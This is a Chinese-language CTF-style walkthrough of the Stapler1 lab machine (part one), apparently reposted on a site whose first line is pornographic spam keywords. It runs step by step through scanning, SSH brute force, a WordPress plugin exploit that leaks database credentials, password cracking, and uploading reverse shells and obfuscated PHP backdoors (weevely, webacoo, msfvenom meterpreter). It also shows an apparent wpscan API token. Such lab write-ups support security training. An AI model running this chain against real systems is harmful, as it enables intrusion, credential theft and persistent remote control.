国产粉嫩无码不卡在线观看,酒店大战丝袜高跟鞋人妻,特级精品毛片免费观看,欧美亚洲日本国产综合在线

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

聲明:本文僅用于技術(shù)討論與研究,對于所有筆記中復(fù)現(xiàn)的這些終端或者服務(wù)器,都是自行搭建的環(huán)境進行滲透的。我將使用kali Linux作為此次學(xué)習(xí)的攻擊者機器。這里使用的技術(shù)僅用于學(xué)習(xí)教育目的,如果列出的技術(shù)用于其他任何目標(biāo),本站及作者概不負責(zé)。

一、信息收集

信息收集非常重要,有了信息才能知道下一步該如何進行,接下來將用nmap來演示信息收集:

1、nmap掃描存活I(lǐng)P

由于本項目環(huán)境是nat模式需要項目IP地址,掃描挖掘本地的IP地址信息:

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

發(fā)現(xiàn)本kali ip為40段!用40段進行全網(wǎng)段掃描:

nmap -sP 192.168.40.0/24

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

發(fā)現(xiàn)項目IP為152!

2、nmap全端口服務(wù)枚舉

進行namp全端口服務(wù)枚舉:

nmap -sS -sV -A -T5 -p- 192.168.40.152

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

得到開放的端口信息:

21/tcp open ftp vsftpd 2.0.8 or later FTP-anon: Anonymous FTP login allowed (FTP code 230)22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)53/tcp open domain dnsmasq 2.7580/tcp open http PHP cli server 5.5 or later123/tcp closed ntp139/tcp open NetBIOS-ssn samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)666/tcp open doom? message2.jpgUT 3306/tcp open mysql MySQL 5.7.12-0ubuntu112380/tcp open http Apache httpd 2.4.18 ((Ubuntu))

以及smb2(windows445端口,共享用)利用!
可以看到有很多容易受到攻擊的端口都開著,F(xiàn)TP、NetBIOS、MySQL和運行Web服務(wù)器(Apache HTTPD)的端口12380等等!

二、各類服務(wù)端口信息枚舉

【→所有資源關(guān)注我,私信回復(fù)“資料”獲取←】
1、網(wǎng)絡(luò)安全學(xué)習(xí)路線
2、電子書籍(白帽子)
3、安全大廠內(nèi)部視頻
4、100份src文檔
5、常見安全面試題
6、ctf大賽經(jīng)典題目解析
7、全套工具包
8、應(yīng)急響應(yīng)筆記

1、FTP信息枚舉

根據(jù)nmap全端口服務(wù)枚舉的提示,ftp允許匿名登錄:

21/tcp open ftp vsftpd 2.0.8 or later ftp-anon: Anonymous FTP login allowed (FTP code 230)

1)ftp匿名登錄枚舉

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

ftp 192.168.40.152get note ---下載note文件

未授權(quán)登錄成功,查到note文件,并下載查看!

2)查看note文件

通過ftp下載該文件進行查看:

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.

里面是txt文本信息:說將賬號信息留存在FTP中,那么還有別的賬號密碼!
獲得兩個用戶名:Elly、John,其他無可用信息!

2、Samba信息收集

這是139的Samba服務(wù),可以用smbclient來查看。

smbclient是一個開放的netbios-ssn,用smbclient來查看(屬于samba套件,它提供一種命令行使用交互式方式訪問samba服務(wù)器的共享資源)!用Enum4linux枚舉,這是一個用于枚舉來自Windows和Samba系統(tǒng)的信息的工具。

1)Enum4linux枚舉

enum4linux -a 192.168.40.152-a 做所有參數(shù)選項枚舉一遍

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

獲取到2個可用信息:
1. ok活躍信息:

//192.168.40.152/kathy Mapping: OK, Listing: OK//192.168.40.152/tmp Mapping: OK, Listing: OK

kathy和tmp兩個信息非?;钴S!可以用smbclient連接!

2. 發(fā)現(xiàn)了20個用戶信息

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

kathy和tmp兩個信息非?;钴S!可以用smbclient連接!

2)保存用戶信息,并篩查

gedit user.txtcat user.txt | cut -d '' -f2 | cut -d ' ' -f1 > user.txt

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

將通過篩選剔除后,獲得正常的用戶名:user.txt!

3、暴力破解ssh信息枚舉

1)hydra暴力破解

nmap掃描ssh端口為開放狀態(tài),利用hydra爆破

hydra -L user.txt -P user.txt 192.168.40.152 ssh

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

login: SHayslett password: SHayslett

獲得ssh登錄賬號密碼!

2)ssh登錄

ssh嘗試登錄:

ssh SHayslett@192.168.40.152

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

登錄成功!到了這一步有非常多的提權(quán)方法,咱們繼續(xù)分析該項目環(huán)境!

4、nc信息枚舉666端口

1)訪問http端口

通過瀏覽器訪問該端口:

http://192.168.40.152:666/

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

發(fā)現(xiàn)這是一個文件!

2)nc下載文件

通過nc訪問該端口進行探測:

nc 192.168.40.152 666 >test #將文件下載為test file test #查看test版本unzip -h #看下zip版本信息unzip test #用zip解壓test文件

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

通過nc下載壓縮文件,并解壓獲得message2的jpg圖片!

3)Strings查看圖片信息

strings查看該圖片隱藏信息:

strings message2.jpg

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

給了兩個cookie值,先留著該信息!

5、枚舉12380端口信息收集

1)訪問端口

用瀏覽器訪問該頁面:

http://192.168.40.152:12380/

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

發(fā)現(xiàn)該頁面沒有可利用的信息,進行漏掃看看!

2)Nikto掃描URL

nikto 是一款開放源代碼的、功能強大的 WEB 掃描評估軟件,能對 web 服務(wù)器多種安全項目進行測試的掃描軟件,去尋找已知有名的漏洞,能在230多種服務(wù)器上掃描出2600多種有潛在危險的文件、CGI 及其他問題,它可以掃描指定主機的 WEB 類型、主機名、特定目錄、Cookie、特定 CGI 漏洞、返回主機允許的 http 模式等等。

nikto -h http://192.168.40.152:12380/

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

發(fā)現(xiàn)三個目錄/admin112233/、/blogblog/、/phpmyadmin/,發(fā)現(xiàn)提示ssl Info,說明是ssl訪問的,可以HTTPS訪問,嘗試訪問http訪問會重定向回來,需要HTTPS訪問URL!

3)ssl訪問

先枚舉訪問/admin112233目錄:

https://192.168.40.152:12380/admin112233/

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

回顯:This could of been a BeEF-XSS hook ??,存在XSS!

枚舉訪問/blogblog目錄:

https://192.168.40.152:12380/blogblog/

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

發(fā)現(xiàn)該網(wǎng)站的是用wordpress搭建的,版本是4.2.1

枚舉訪問/phpmyadmin目錄:

https://192.168.40.152:12380/phpmyadmin

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

得到phpmyadmin的后臺登錄界面,需要賬戶密碼!

6、Wpscan信息收集

從blogblog目錄可以發(fā)現(xiàn)該站存在wordpress站!可利用wpscan進行枚舉掃描!

1)wpscan掃描blogblog網(wǎng)頁

wpscan --url https://192.168.40.152:12380/blogblog/ --disable-tls-checks--disable-tls-checks ---因為會受到SSL對等證書/SSH錯誤臨時用法!

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

提示我們登錄https://wpscan.com/register獲取wpscan API令牌,才能輸出漏洞數(shù)據(jù)

2)獲取wpscan API令牌

需要訪問官網(wǎng),獲取密匙

https://wpscan.com/register

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

在官網(wǎng)登錄后主頁面存在API token復(fù)制即可!

3)wpscan掃描

通過獲取的token直接開始掃描:

wpscan --url https://192.168.40.152:12380/blogblog/ -e u --api-token kJ4bhZCgveCcoGJPER7AOsHJTeFDf90Wfj9zu0V6asc --disable-tls-checks

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

掃描發(fā)現(xiàn)該目錄:blogblog/wp-content/,訪問下收集信息!還存在很多漏洞CVE信息,如感興趣可深入研究!

4)訪問發(fā)現(xiàn)有3個子目錄

在blogblog/wp-content/plugins/發(fā)現(xiàn):

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

發(fā)現(xiàn)存在advanced_video_embed.php,提示存在wordpress advanced video插件模塊信息!

三、wordpress advanced漏洞利用

1、39646 exp利用

谷歌搜索:

wordpress advanced video exploit

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

可以利用39646,在kali上查找并利用!

2、查找并利用py腳本

kali滲透系統(tǒng)自帶很多exp腳本,直接查找即可!

cp /usr/share/exploitdb/exploits/php/webapps/39646.py .

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

將exp復(fù)制到利用目錄!

3、修改exp代碼

添加修改以下內(nèi)容:

import sslssl._create_default_https_context = ssl._create_unverified_contexturl = "https://192.168.40.152:12380/blogblog/"

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

4、訪問URL文件上傳頁面:

通過修改exp代碼,進行對項目環(huán)境滲透行為后,在upload目錄會出現(xiàn)新的文件內(nèi)容:

https://192.168.40.152:12380/blogblog/wp-content/uploads

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

目錄下會出現(xiàn)圖片:193104749.jpeg,下載:

wget --no-check-certificate https://192.168.40.152:12380/blogblog/wp-content/uploads/193104749.jpeg--no-check-certificate ---這個參數(shù)可促使wget下載ssl文件

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

下載后進行分析圖片信息!

5、圖片信息枚舉

file查看圖片類型:

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

193104749.jpeg: PHP script, ASCII text

這是一個php代碼的txt文本!直接查看!

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

define('DB_USER', 'root');define('DB_PASSWORD', 'plbkac');

獲得mysql用戶名密碼:

root/plbkac

接下來使用賬號密碼直接枚舉數(shù)據(jù)庫!

四、Mysql信息枚舉 暴力破解

1、庫表信息枚舉

利用圖片枚舉出的mysql數(shù)據(jù)庫賬號密碼進行枚舉:

mysql -uroot -pplbkac -h 192.168.40.152 #利用獲得的賬戶密碼遠程登錄show databases; #查看數(shù)據(jù)庫信息use wordpress #進入wordpressshow tables; #查看表信息

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

通過mysql命令枚舉到數(shù)據(jù)庫wordpress庫中存在wp_users表信息!

2、表字段信息枚舉

讀取wp_user用戶表數(shù)據(jù):

desc wp_users;select user_login,user_pass from wp_users;或者select * from wp_users;

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

通過select枚舉出該表所有信息內(nèi)容存在用戶名和MD5加密的密碼信息!將數(shù)據(jù)保存至本地:

gedit 1.txt

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

3、awk分解保存

使用awk進行文本出來提取user_pass這個字段所有值,在保存至pass.txt
awk拆分密碼信息:
密碼在第3部分

awk -F'|' '{print $3}' 1.txt > pass.txt

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

4、john爆破密碼本

繼續(xù)使用John的rockyou文本對mysql密碼信息進行爆破:

john --wordlist=/usr/share/wordlists/rockyou.txt pass.txt

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

$P$B7889EMq/erHIuZapMB8GEizebcIy9.:incorrect

發(fā)現(xiàn)對應(yīng)john用戶,密碼為incorrect

五、Getshell

通過暴力破解數(shù)據(jù)庫中的密碼值,發(fā)現(xiàn)了賬號密碼信息可直接登錄wordpress后臺,登錄后有很多方法可以getshell,接下來就簡單介紹利用!

1、登錄后臺

訪問后臺頁面,用賬戶:john,密碼:incorrect

https://192.168.40.152:12380/blogblog/wp-login.php

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

測試可成功登錄!

2、文件上傳

Plugins-》 add New -》upload Plugin :存在上傳文件

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

3、php-webshell利用

復(fù)制phpshell到本文件夾:

cp /usr/share/webshells/php/php-reverse-shell.php .

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

配置PHP文件,將IP更改為本地kail IP:

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

修改完成即可上傳文件!上傳PHP文件:

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

查看是否上傳成功:

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

上傳成功!本地開啟nc服務(wù),并訪問后門進行反彈shell:

nc -vlp 1234https://192.168.40.152:12380/blogblog/wp-content/uploads/php-reverse-shell.php

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

成功獲得反彈shell,并控制項目環(huán)境服務(wù)器!

4、weevely利用

1)利用weevely生成PHP木馬文件

Weevely是一個隱形的PHP網(wǎng)頁的外殼,模擬的遠程連接。

軟件特點:

生成和管理很難檢測到的PHP木馬,這是一個Web應(yīng)用程序后開發(fā)的重要工具,可用于像一個隱藏的后門,作為一個有用的遠程控制臺更換管理網(wǎng)絡(luò)帳戶,即使托管在免費托管服務(wù)。只是生成并上傳“服務(wù)器”目標(biāo)Web服務(wù)器上的PHP代碼,Weevely客戶端在本地運行shell命令傳輸。

weevely generate pass11 test.php ---生成test.php文件密碼為passtestgenerate ---生成新代理

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

weevely的優(yōu)勢在于免殺性,可看到php木馬信息是混淆過的特征!

2)上傳文件

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

驗證上傳是否成功:

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

成功上傳!

3)運行該PHP文件,獲得shell

weevely https://192.168.40.152:12380/blogblog/wp-content/uploads/test.php passtest

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

成功獲得shell,該shell很穩(wěn)定!

5、webacoo利用

WeBaCoo(Web Backdoor Cookie)是一款隱蔽的腳本類Web后門工具。 借助HTTP協(xié)議,它可在客戶端和Web服務(wù)器之間實現(xiàn)執(zhí)行代碼的網(wǎng)頁終端。 WeBaCoo的精妙之處在于,Web服務(wù)器和客戶端之間的通信載體是Cookie。

1)webacoo生成PHP后門文件

webacoo -g -o webacoo.php-g 生成后門代碼(需要-o)-o OUTPUT 生成的后門輸出文件名

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

可看到webacoo也是通過特征混淆了php木馬,但是沒用weevely免殺性能好!

2)后臺頁面上傳該PHP后門

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

訪問是否上傳成功:

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

成功上傳!

3)遠程連接執(zhí)行PHP文件

webacoo -t -u https://192.168.40.152:12380/blogblog/wp-content/uploads/webacoo.php-t 建立遠程“終端”連接(需要-u)-u URL 后門 URL

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

成功獲得shell,該shell很穩(wěn)定!

6、MSFconsole上線webshell

Metasploit項目是一個旨在提供安全漏洞信息計算機安全項目,可以協(xié)助安全工程師進行滲透測試(penetration testing)及入侵檢測系統(tǒng)簽名開發(fā)。

1)kali本地生成webshell

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.40.149 LPORT=4455 -f raw > msf.php--LHOST 為kali本地IP--LPORT 為連接端口

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

生成成功msf.php木馬文件!

2)后臺上傳PHP文件

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

上傳成功:

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

成功上傳后需要msf開啟監(jiān)聽!

3)msf開啟監(jiān)聽

開啟msfconsole進入MSF框架:

msfconsoleuse exploit/multi/handlerset payload php/meterpreter_reverse_tcpset LHOST 192.168.40.149set LPORT 4455run

「網(wǎng)絡(luò)安全」紅隊滲透項目之Stapler1(上)(網(wǎng)絡(luò)安全紅隊是什么意思)

開啟監(jiān)聽后,訪問msf.php文件觸發(fā),可看到反彈shell成功!

版權(quán)聲明:本文內(nèi)容由互聯(lián)網(wǎng)用戶自發(fā)貢獻,該文觀點僅代表作者本人。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如發(fā)現(xiàn)本站有涉嫌抄襲侵權(quán)/違法違規(guī)的內(nèi)容, 請發(fā)送郵件至 舉報,一經(jīng)查實,本站將立刻刪除。